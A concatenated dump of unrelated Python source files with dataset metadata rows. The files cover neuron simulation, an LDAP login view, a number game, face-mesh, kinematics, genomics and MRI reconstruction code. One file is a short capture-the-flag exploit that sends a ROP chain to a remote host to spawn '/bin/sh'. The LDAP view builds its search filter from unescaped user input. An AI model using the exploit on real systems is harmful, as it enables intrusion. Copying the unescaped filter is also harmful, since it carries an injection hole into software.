def get_membrane_potential(self):
"""Must return a neo.AnalogSignal."""
signal = neo.AnalogSignal(self.vm,
units="mV",
sampling_period=h.dt * ms)
return signal
def inject_current(self, current):
"""
Injects somatic current into the model.
Parameters
----------
current : a dictionary like:
{'amplitude':-10.0*pq.pA,
'delay':100*pq.ms,
'duration':500*pq.ms}}
where 'pq' is the quantities package
"""
self.iclamp.amp = current["amplitude"]
self.iclamp.delay = current["delay"]
self.iclamp.dur = current["duration"]
def run(self, tstop):
t_alert = 100.0
h.check_simulator()
h.cvode.active(0)
self.vm.resize(0)
h.finitialize(h.v_init)
while h.t < tstop:
h.fadvance()
if self.run_alerts and h.t > t_alert:
print("\tTime: {} ms out of {} ms".format(t_alert, tstop))
t_alert += 100.0
| 40.282609 | 135 | 0.589674 | 701 | 5,559 | 4.536377 | 0.296719 | 0.024528 | 0.037736 | 0.030818 | 0.178616 | 0.142138 | 0.096541 | 0.086164 | 0.07673 | 0.025157 | 0 | 0.010299 | 0.301313 | 5,559 | 137 | 136 | 40.576642 | 0.808445 | 0.129879 | 0 | 0.029703 | 0 | 0 | 0.125791 | 0.00591 | 0 | 0 | 0 | 0 | 0 | 1 | 0.059406 | false | 0.009901 | 0.089109 | 0 | 0.168317 | 0.049505 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7505d6ec1c66fa5c31c1b68248657004784ebb2 | 5,401 | py | Python | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | 1 | 2018-12-25T23:18:35.000Z | 2018-12-25T23:18:35.000Z | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | 6 | 2018-12-12T17:15:11.000Z | 2020-01-22T14:00:07.000Z | invenio_ldapclient/views.py | galterlibrary/invenio-ldapclient | 48b24b5bf46fd40c22dce042f54eaab6b7d377c3 | [
"MIT"
] | null | null | null | """Invenio-LDAPClient login view."""
from __future__ import absolute_import, print_function
import uuid
from flask import Blueprint, after_this_request
from flask import current_app as app
from flask import flash, redirect, render_template, request
from flask_security import login_user
from invenio_accounts.models import User
from invenio_db import db
from invenio_userprofiles.models import UserProfile
from ldap3 import ALL, ALL_ATTRIBUTES, Connection, Server
from werkzeug.local import LocalProxy
from .forms import login_form_factory
_security = LocalProxy(lambda: app.extensions['security'])
_datastore = LocalProxy(lambda: _security.datastore)
blueprint = Blueprint(
'invenio_ldapclient',
__name__,
template_folder='templates',
static_folder='static',
)
def _commit(response=None):
_datastore.commit()
return response
def _ldap_connection(form):
"""Make LDAP connection based on configuration."""
if not form.validate_on_submit():
return False
form_pass = form.password.data
form_user = form.username.data
if not form_user or not form_pass:
return False
if app.config['LDAPCLIENT_CUSTOM_CONNECTION']:
return app.config['LDAPCLIENT_CUSTOM_CONNECTION'](
form_user, form_pass
)
ldap_server_kwargs = {
'port': app.config['LDAPCLIENT_SERVER_PORT'],
'get_info': ALL,
'use_ssl': app.config['LDAPCLIENT_USE_SSL']
}
if app.config['LDAPCLIENT_TLS']:
ldap_server_kwargs['tls'] = app.config['LDAPCLIENT_TLS']
server = Server(
app.config['LDAPCLIENT_SERVER_HOSTNAME'],
**ldap_server_kwargs
)
ldap_user = "{}={},{}".format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'],
form_user,
app.config['LDAPCLIENT_BIND_BASE']
)
return Connection(server, ldap_user, form_pass)
def _search_ldap(connection, username):
"""Fetch the user entry from LDAP."""
search_attribs = app.config['LDAPCLIENT_SEARCH_ATTRIBUTES']
if search_attribs is None:
search_attribs = ALL_ATTRIBUTES
connection.search(
app.config['LDAPCLIENT_SEARCH_BASE'],
'({}={})'.format(
app.config['LDAPCLIENT_USERNAME_ATTRIBUTE'], username
),
attributes=search_attribs)
def _register_or_update_user(entries, user_account=None):
"""Register or update a user."""
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
username = entries[app.config['LDAPCLIENT_USERNAME_ATTRIBUTE']].values[0]
if 'LDAPCLIENT_FULL_NAME_ATTRIBUTE' in app.config:
full_name = entries[app.config[
'LDAPCLIENT_FULL_NAME_ATTRIBUTE'
]].values[0]
if user_account is None:
kwargs = dict(email=email, active=True, password=uuid.uuid4().hex)
_datastore.create_user(**kwargs)
user_account = User.query.filter_by(email=email).one_or_none()
profile = UserProfile(user_id=int(user_account.get_id()))
else:
user_account.email = email
db.session.add(user_account)
profile = user_account.profile
profile.full_name = full_name
profile.username = username
db.session.add(profile)
return user_account
def _find_or_register_user(connection, username):
"""Find user by email, username or register a new one."""
_search_ldap(connection, username)
entries = connection.entries[0]
if not entries:
return None
try:
email = entries[app.config['LDAPCLIENT_EMAIL_ATTRIBUTE']].values[0]
except IndexError:
# Email is required
return None
# Try by username first
user = User.query.join(UserProfile).filter(
UserProfile.username == username
).one_or_none()
# Try by email next
if not user and app.config['LDAPCLIENT_FIND_BY_EMAIL']:
user = User.query.filter_by(email=email).one_or_none()
if user:
if not user.active:
return None
return _register_or_update_user(entries, user_account=user)
# Register new user
if app.config['LDAPCLIENT_AUTO_REGISTRATION']:
return _register_or_update_user(entries)
@blueprint.route('/ldap-login', methods=['GET', 'POST'])
def ldap_login():
"""
LDAP login form view.
Process login request using LDAP and register
the user if needed.
"""
form = login_form_factory(app)()
if form.validate_on_submit():
connection = _ldap_connection(form)
if connection and connection.bind():
after_this_request(_commit)
user = _find_or_register_user(connection, form.username.data)
if user and login_user(user, remember=False):
next_page = request.args.get('next')
# Only allow relative URL for security
if not next_page or next_page.startswith('http'):
next_page = app.config['SECURITY_POST_LOGIN_VIEW']
connection.unbind()
db.session.commit()
return redirect(next_page)
else:
connection.unbind()
flash("We couldn't log you in, please contact your administrator.") # noqa
else:
flash("We couldn't log you in, please check your password.")
return render_template(
app.config['SECURITY_LOGIN_USER_TEMPLATE'],
login_user_form=form
)
| 29.839779 | 91 | 0.672098 | 650 | 5,401 | 5.324615 | 0.236923 | 0.054608 | 0.098815 | 0.030049 | 0.171338 | 0.12453 | 0.088992 | 0.067033 | 0.050852 | 0 | 0 | 0.001688 | 0.231994 | 5,401 | 180 | 92 | 30.005556 | 0.83269 | 0.072949 | 0 | 0.096 | 0 | 0 | 0.148597 | 0.092267 | 0 | 0 | 0 | 0 | 0 | 1 | 0.048 | false | 0.048 | 0.096 | 0 | 0.248 | 0.032 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e750a7db318e1b1722b11d4663f54e8a2e8abb6a | 1,125 | py | Python | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | 4 | 2021-04-23T18:07:58.000Z | 2021-05-12T11:38:14.000Z | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | null | null | null | 10 - Using break/Des_068.py | o-Ian/Practice-Python | 1e4b2d0788e70006096a53a7cf038db3148ba4b7 | [
"MIT"
] | null | null | null | from random import randint
perder = ganhou = 0
print('\n=-=-=-=-TENTE GANHAR DE MIM NO PAR OU ÍMPAR!=-=-=-=-\n')
while True:
print('-=' * 15)
eu = int(input('Digite um número: '))
pc = randint(1, 100)
par_ganhou = impar_ganhou = 0
i_p = ' '
while i_p not in 'IP':
i_p = input('Você escolhe ímpar ou par? [I/P]: ') .strip() .upper()[0]
soma = eu + pc
print('-=' * 15)
if i_p == 'P' and soma % 2 == 0:
print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é PAR.')
ganhou += 1
elif i_p == 'I' and soma % 2 != 0:
print(f'VOCÊ GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é ÍMPAR.')
ganhou += 1
else:
x = ''
if soma % 2 == 0:
x = 'PAR'
else:
x = 'ÍMPAR'
print(f'O COMPUTADOR GANHOU!\nO computador escolheu {pc} e você {eu}, a soma disso é {soma}, que é {x}.')
perder += 1
if perder != 0:
break
print('-'*50)
print(f'Você PERDEU! Você conseguiu ganhar {ganhou} vezes consecutivamente!')
print('-'*50)
| 31.25 | 113 | 0.533333 | 172 | 1,125 | 3.447674 | 0.354651 | 0.020236 | 0.030354 | 0.131535 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0.337268 | 0 | 0.031766 | 0.300444 | 1,125 | 35 | 114 | 32.142857 | 0.721728 | 0 | 0 | 0.25 | 0 | 0.09375 | 0.413333 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.03125 | 0 | 0.03125 | 0.28125 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7531c6aec53aa133b091d9c44add5e29edc53d4 | 446 | py | Python | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | 4 | 2021-08-01T07:53:26.000Z | 2021-09-08T08:50:09.000Z | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | null | null | null | rop1-sean_Pwn-2/hack.py | ss8651twtw/Pwn-CTF-writeups | 930a85169c2110594479cf66528b79e8ddae46a2 | [
"MIT"
] | 1 | 2022-03-22T10:13:53.000Z | 2022-03-22T10:13:53.000Z | from pwn import *
import time
context.arch = "amd64"
ip = "140.110.112.77"
port = 3122
r = remote(ip, port)
# r = process("./rop1")
data = 0x6ccd60
pop_rsi = 0x401637
pop_rax_rdx_rbx = 0x478616
pop_rdi = 0x401516
syscall = 0x4672b5
leave = 0x4009e4
r.sendline(flat(0xdeadbeef, pop_rax_rdx_rbx, 0x3b, 0, 0, pop_rdi, data + (10 * 0x8), pop_rsi, 0, syscall, '/bin/sh\x00'))
r.sendlineafter("=", b'a' * 32 + flat(data, leave))
r.interactive()
| 18.583333 | 121 | 0.681614 | 72 | 446 | 4.083333 | 0.666667 | 0.040816 | 0.061224 | 0.081633 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.184 | 0.159193 | 446 | 23 | 122 | 19.391304 | 0.6 | 0.047085 | 0 | 0 | 0 | 0 | 0.07565 | 0 | 0 | 0 | 0.153664 | 0 | 0 | 1 | 0 | false | 0 | 0.133333 | 0 | 0.133333 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7541e90aae6724fc21be662cfca2ab9529171ad | 3,548 | py | Python | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | 1 | 2021-09-02T09:03:53.000Z | 2021-09-02T09:03:53.000Z | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | 1 | 2021-10-21T14:50:06.000Z | 2021-10-21T14:50:06.000Z | jikanvision/FaceMeshModule.py | JikanDev/jikanvision | 09cd4ecdbfe6423cdf2c6f4ae064fcafae576eb0 | [
"Apache-2.0"
] | null | null | null | """
Face Mesh Module
By : JikanDev
Website : https://jikandev.xyz/
"""
import cv2
import mediapipe as mp
class FaceMeshDetector():
"""
Find 468 Landmarks using the mediapipe library. Exports the landmarks in pixel format.
"""
def __init__(self, mode=False, maxFaces=1, refine_lm=False, minDetectCon=0.5, minTrackCon=0.5):
"""
:param mode: In static mode, detection is done on each image: slower.
:param maxFaces: Maximum number of faces to detect.
:param refine_lm: Whether to further refine the landmark coordinates
around the eyes and lips, and output additional landmarks around the
irises.
:param minDetectCon: Minimum Detection Confidence Threshold.
:param minTrackCon: Minimum Tracking Confidence Threshold.
"""
self.mode = mode
self.maxFaces = maxFaces
self.refine_lm = refine_lm
self.minDetectCon = minDetectCon
self.minTrackCon = minTrackCon
self.mpDraw = mp.solutions.drawing_utils
self.mpDrawingStyles = mp.solutions.drawing_styles
self.faceMesh = mp.solutions.face_mesh
self.meshDetection = self.faceMesh.FaceMesh(mode, maxFaces, refine_lm, minDetectCon, minTrackCon)
def findFaces(self, img, draw=True, drawTesselation=True):
"""
Find faces in an image and return the bbox info
:param img: Image to find the faces in.
:param draw: Flag to draw the output contours of the mesh on the image.
:param drawTesselation: Flag to draw the output tesselation of the mesh on the image.
:return: Image with or without drawings.
"""
imgRGB = cv2.cvtColor(img, cv2.COLOR_BGR2RGB)
self.results = self.meshDetection.process(imgRGB)
allFaces = []
h, w, c = img.shape
if self.results.multi_face_landmarks:
for faceLms in self.results.multi_face_landmarks:
myMesh = {}
mylmList = []
for id, lm in enumerate(faceLms.landmark):
px, py = int(lm.x * w), int(lm.y * h)
mylmList.append([px, py])
myMesh["lmList"] = mylmList
if draw:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_CONTOURS, None)
if drawTesselation:
self.mpDraw.draw_landmarks(img, faceLms, self.faceMesh.FACEMESH_TESSELATION, None,
self.mpDrawingStyles.get_default_face_mesh_tesselation_style())
allFaces.append(myMesh)
return allFaces, img
def main():
"""
Example code to use the module.
"""
cap = cv2.VideoCapture(0) # Get your camera
detector = FaceMeshDetector() # Call the FaceMeshDetector class
while True:
success, img = cap.read() # If success, img = read your camera image
meshes, img = detector.findFaces(img) # meshes & img call the findFaces() function of FaceMeshDetector
if meshes:
# Mesh 1
mesh1 = meshes[0]
lmList1 = mesh1["lmList"] # List of 21 Landmark points
if len(meshes) == 2:
# Mesh 2
mesh2 = meshes[1]
lmList2 = mesh2["lmList"] # List of 21 Landmark points
cv2.imshow("Face Mesh Module", img)
cv2.waitKey(1)
if __name__ == "__main__":
main() | 35.48 | 112 | 0.592728 | 397 | 3,548 | 5.211587 | 0.375315 | 0.019333 | 0.029 | 0.012566 | 0.143064 | 0.096665 | 0.051232 | 0.051232 | 0.051232 | 0 | 0 | 0.013389 | 0.326381 | 3,548 | 100 | 113 | 35.48 | 0.852301 | 0.303551 | 0 | 0 | 0 | 0 | 0.019074 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.061224 | false | 0 | 0.040816 | 0 | 0.142857 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e756f3d909ed9cf27d6e6754f6228111304c2edd | 6,728 | py | Python | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | 21 | 2021-10-02T00:07:05.000Z | 2022-03-30T00:02:10.000Z | cellpack/mgl_tools/mglutil/math/kinematics.py | mesoscope/cellpack | ec6b736fc706c1fae16392befa814b5337a3a692 | [
"MIT"
] | null | null | null | ## Automatically adapted for numpy.oldnumeric Jul 23, 2007 by
#
# Last modified on Mon Oct 15 15:33:49 PDT 2001 by lindy
#
# $Header: /opt/cvs/python/packages/share1.5/mglutil/math/kinematics.py,v 1.16 2007/07/24 17:30:40 vareille Exp $
#
"""kinematics.py - kinematic manipulation of chains of points
All transformations happen in the local coordinate space.
The refCoords supplied to the constructor and returned by the object
are local to the object. Clients should handle putting the points into
world coordinates (using translation, orientation, and origin).
"""
# from mglutil.math.ncoords import Ncoords
from mglutil.math.rotax import rotax
import numpy.oldnumeric as Numeric, math
class Kinematics:
rads_per_degree = Numeric.pi / 180.0
def __init__(self, allAtomsCoords, torTree, tolist=1):
"""refCoords is an nx3 list of n points
resultCoords is set up and maintained as homogeneous coords
"""
self.allAtomsCoords = allAtomsCoords
self.torTree = torTree
def __applyTorsion(self, node, parent_mtx):
"""Transform the subtree rooted at node.
The new torsion angle must be pre-set.
Children of the node are transformed recursively.
"""
# get rotation matrix for node
# my_mtx = self.rotax(node)
mtx = rotax(
Numeric.array(node.a.coords),
Numeric.array(node.b.coords),
node.angle * self.rads_per_degree,
transpose=1,
)
# node_mtx = Numeric.dot(parent_mtx, mtx)
node_mtx = self.mult4_3Mat(parent_mtx, mtx)
# set-up for the transformation
mm11 = node_mtx[0][0]
mm12 = node_mtx[0][1]
mm13 = node_mtx[0][2]
mm21 = node_mtx[1][0]
mm22 = node_mtx[1][1]
mm23 = node_mtx[1][2]
mm31 = node_mtx[2][0]
mm32 = node_mtx[2][1]
mm33 = node_mtx[2][2]
mm41 = node_mtx[3][0]
mm42 = node_mtx[3][1]
mm43 = node_mtx[3][2]
atomSet = node.atomSet
# transform the coordinates for the node
for i in node.atomRange:
x, y, z = node.coords[i][:3] # get origin-subtracted originals
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# recurse through children
for child in node.children:
self.__applyTorsion(child, node_mtx)
def applyAngList(self, angList, mtx):
""""""
# pre-set the torsion angles
self.torTree.setTorsionAngles(angList)
# set-up for the transformation
mm11 = mtx[0][0]
mm12 = mtx[0][1]
mm13 = mtx[0][2]
mm21 = mtx[1][0]
mm22 = mtx[1][1]
mm23 = mtx[1][2]
mm31 = mtx[2][0]
mm32 = mtx[2][1]
mm33 = mtx[2][2]
mm41 = mtx[3][0]
mm42 = mtx[3][1]
mm43 = mtx[3][2]
root = self.torTree.rootNode
atomSet = root.atomSet
# transform the coordinates for the node
for i in root.atomRange:
x, y, z = root.coords[i][:3]
c = atomSet[i].coords
c[0] = x * mm11 + y * mm21 + z * mm31 + mm41
c[1] = x * mm12 + y * mm22 + z * mm32 + mm42
c[2] = x * mm13 + y * mm23 + z * mm33 + mm43
# traverse children of rootNode
for child in root.children:
self.__applyTorsion(child, mtx)
def mult4_3Mat(self, m1, m2):
ma11 = m1[0][0]
ma12 = m1[0][1]
ma13 = m1[0][2]
ma21 = m1[1][0]
ma22 = m1[1][1]
ma23 = m1[1][2]
ma31 = m1[2][0]
ma32 = m1[2][1]
ma33 = m1[2][2]
ma41 = m1[3][0]
ma42 = m1[3][1]
ma43 = m1[3][2]
mb11 = m2[0][0]
mb12 = m2[0][1]
mb13 = m2[0][2]
mb21 = m2[1][0]
mb22 = m2[1][1]
mb23 = m2[1][2]
mb31 = m2[2][0]
mb32 = m2[2][1]
mb33 = m2[2][2]
mb41 = m2[3][0]
mb42 = m2[3][1]
mb43 = m2[3][2]
# first line of resulting matrix
val1 = ma11 * mb11 + ma12 * mb21 + ma13 * mb31
val2 = ma11 * mb12 + ma12 * mb22 + ma13 * mb32
val3 = ma11 * mb13 + ma12 * mb23 + ma13 * mb33
result = [[val1, val2, val3, 0.0]]
# second line of resulting matrix
val1 = ma21 * mb11 + ma22 * mb21 + ma23 * mb31
val2 = ma21 * mb12 + ma22 * mb22 + ma23 * mb32
val3 = ma21 * mb13 + ma22 * mb23 + ma23 * mb33
result.append([val1, val2, val3, 0.0])
# third line of resulting matrix
val1 = ma31 * mb11 + ma32 * mb21 + ma33 * mb31
val2 = ma31 * mb12 + ma32 * mb22 + ma33 * mb32
val3 = ma31 * mb13 + ma32 * mb23 + ma33 * mb33
result.append([val1, val2, val3, 0.0])
# fourth line of resulting matrix
val1 = ma41 * mb11 + ma42 * mb21 + ma43 * mb31 + mb41
val2 = ma41 * mb12 + ma42 * mb22 + ma43 * mb32 + mb42
val3 = ma41 * mb13 + ma42 * mb23 + ma43 * mb33 + mb43
result.append([val1, val2, val3, 1.0])
return result
def rotax(self, node):
"""
Build 4x4 matrix of clockwise rotation about axis a-->b
by angle tau (radians).
a and b are numeric arrys of floats of shape (3,)
Result is a homogenous 4x4 transformation matrix.
NOTE: This has been changed by Brian, 8/30/01: rotax now returns
the rotation matrix, _not_ the transpose. This is to get
consistency across rotax, mat_to_quat and the classes in
transformation.py
"""
tau = node.angle * self.rads_per_degree
ct = math.cos(tau)
ct1 = 1.0 - ct
st = math.sin(tau)
v = node.torUnitVector
rot = Numeric.zeros((4, 4), "f")
# Compute 3x3 rotation matrix
v2 = v * v
v3 = (1.0 - v2) * ct
rot[0][0] = v2[0] + v3[0]
rot[1][1] = v2[1] + v3[1]
rot[2][2] = v2[2] + v3[2]
rot[3][3] = 1.0
v2 = v * st
rot[1][0] = v[0] * v[1] * ct1 - v2[2]
rot[2][1] = v[1] * v[2] * ct1 - v2[0]
rot[0][2] = v[2] * v[0] * ct1 - v2[1]
rot[0][1] = v[0] * v[1] * ct1 + v2[2]
rot[1][2] = v[1] * v[2] * ct1 + v2[0]
rot[2][0] = v[2] * v[0] * ct1 + v2[1]
# add translation
a = node.torBase.coords
print((" torBase (%2d) %4f, %4f, %4f:" % (node.bond[0], a[0], a[1], a[2])))
for i in (0, 1, 2):
rot[3][i] = a[i]
for j in (0, 1, 2):
rot[3][i] = rot[3][i] - rot[j][i] * a[j]
rot[i][3] = 0.0
return rot
| 32.191388 | 113 | 0.522889 | 983 | 6,728 | 3.537131 | 0.255341 | 0.032212 | 0.017256 | 0.024159 | 0.186368 | 0.146678 | 0.115042 | 0.103538 | 0.071326 | 0.071326 | 0 | 0.13899 | 0.346611 | 6,728 | 208 | 114 | 32.346154 | 0.651956 | 0.254162 | 0 | 0.076923 | 0 | 0 | 0.006804 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.038462 | false | 0 | 0.015385 | 0 | 0.084615 | 0.007692 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7584bf56075da23dbb46430a6950a9f3d4405c0 | 2,178 | py | Python | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 5 | 2020-01-30T15:03:40.000Z | 2022-01-25T18:44:16.000Z | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 2 | 2020-01-04T15:22:16.000Z | 2020-07-16T20:02:42.000Z | ucsc_genomes_downloader/utils/expand_bed_regions.py | LucaCappelletti94/ucsc_genomes_downloader | fdef5fae76a78606279aa3e49e0b009a1b34a436 | [
"MIT"
] | 3 | 2019-12-29T15:19:22.000Z | 2021-03-27T03:05:51.000Z | import pandas as pd
import numpy as np
__all__ = ["expand_bed_regions"]
def expand_bed_regions(bed: pd.DataFrame, window_size: int, alignment: str = "center") -> pd.DataFrame:
"""Return pandas dataframe setting regions to given window size considering given alignment.
Parameters
-----------------------
bed: pd.DataFrame,
Pandas dataframe in bed-like format.
window_size: int,
Target window size.
alignment: str,
Alignment to use for generating windows.
The alignment can be either "left", "right" or "center".
Left alignemnt expands on the right, keeping the left position fixed.
Right alignemnt expands on the left, keeping the right position fixed.
Center alignemnt expands on both size equally, keeping the center position fixed.
Default is center.
Comments
-----------------------
For enhancers peaks usually one should generally use center alignment,
while when working on promoters peaks either right or left alignment
should be used depending on the strand, respectively for positive (right)
and negative (left) strand.
Raises
-----------------------
ValueError,
If given window size is non positive.
ValueError,
When given alignment is not supported.
Returns
-----------------------
Returns a pandas DataFrame in bed-like format containing the tessellated windows.
"""
if not isinstance(window_size, int) or window_size < 1:
raise ValueError("Window size must be a positive integer.")
if alignment == "left":
bed.chromEnd = bed.chromStart + window_size
elif alignment == "right":
bed.chromStart = bed.chromEnd - window_size
elif alignment == "center":
mid_point = (bed.chromEnd + bed.chromStart)//2
bed.chromStart = (mid_point - np.floor(window_size/2)).astype(int)
bed.chromEnd = (mid_point + np.ceil(window_size/2)).astype(int)
else:
raise ValueError((
"Invalid alignment parameter {alignment}. "
"Supported values are: left, right or center."
).format(alignment=alignment))
return bed
| 36.915254 | 103 | 0.649219 | 263 | 2,178 | 5.304183 | 0.365019 | 0.086022 | 0.027957 | 0.028674 | 0.071685 | 0.043011 | 0 | 0 | 0 | 0 | 0 | 0.002415 | 0.239669 | 2,178 | 58 | 104 | 37.551724 | 0.839976 | 0.522957 | 0 | 0 | 0 | 0 | 0.177948 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.05 | false | 0 | 0.1 | 0 | 0.2 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
e7593ec909d2ec472ea74ef88d48fb12c9f615bd | 2,972 | py | Python | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | null | null | null | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | null | null | null | examples/mri/non_cartesian_reconstruction.py | LElgueddari/pisap | ddd9f9f02dcd629b5615fa571ac7795c2d5e9727 | [
"CECILL-B"
] | 1 | 2018-12-04T14:32:15.000Z | 2018-12-04T14:32:15.000Z | """
Neuroimaging non-cartesian reconstruction
=========================================
Author: Chaithya G R
In this tutorial we will reconstruct an MRI image from non-cartesian kspace
measurements.
Import neuroimaging data
------------------------
We use the toy datasets available in pysap, more specifically a 2D brain slice
and the acquisition cartesian scheme.
"""
# Package import
from mri.numerics.fourier import NFFT
from mri.numerics.reconstruct import sparse_rec_fista
from mri.numerics.utils import generate_operators
from mri.numerics.utils import convert_locations_to_mask
from mri.parallel_mri.extract_sensitivity_maps import \
gridded_inverse_fourier_transform_nd
import pysap
from pysap.data import get_sample_data
# Third party import
from modopt.math.metrics import ssim
import numpy as np
# Loading input data
image = get_sample_data('2d-mri')
# Obtain MRI non-cartesian mask
radial_mask = get_sample_data("mri-radial-samples")
kspace_loc = radial_mask.data
mask = pysap.Image(data=convert_locations_to_mask(kspace_loc, image.shape))
# View Input
# image.show()
# mask.show()
#############################################################################
# Generate the kspace
# -------------------
#
# From the 2D brain slice and the acquisition mask, we retrospectively
# undersample the k-space using a radial acquisition mask
# We then reconstruct the zero order solution as a baseline
# Get the locations of the kspace samples and the associated observations
fourier_op = NFFT(samples=kspace_loc, shape=image.shape)
kspace_obs = fourier_op.op(image.data)
# Gridded solution
grid_space = np.linspace(-0.5, 0.5, num=image.shape[0])
grid2D = np.meshgrid(grid_space, grid_space)
grid_soln = gridded_inverse_fourier_transform_nd(kspace_loc, kspace_obs,
tuple(grid2D), 'linear')
image_rec0 = pysap.Image(data=grid_soln)
# image_rec0.show()
base_ssim = ssim(image_rec0, image)
print('The Base SSIM is : ' + str(base_ssim))
#############################################################################
# FISTA optimization
# ------------------
#
# We now want to refine the zero order solution using a FISTA optimization.
# The cost function is set to Proximity Cost + Gradient Cost
# Generate operators
gradient_op, linear_op, prox_op, cost_op = generate_operators(
data=kspace_obs,
wavelet_name="sym8",
samples=kspace_loc,
mu=6 * 1e-7,
nb_scales=4,
non_cartesian=True,
uniform_data_shape=image.shape,
gradient_space="synthesis")
# Start the FISTA reconstruction
max_iter = 200
x_final, costs, metrics = sparse_rec_fista(
gradient_op=gradient_op,
linear_op=linear_op,
prox_op=prox_op,
cost_op=cost_op,
lambda_init=1.0,
max_nb_of_iter=max_iter,
atol=1e-4,
verbose=1)
image_rec = pysap.Image(data=np.abs(x_final))
# image_rec.show()
recon_ssim = ssim(image_rec, image)
print('The Reconstruction SSIM is : ' + str(recon_ssim))
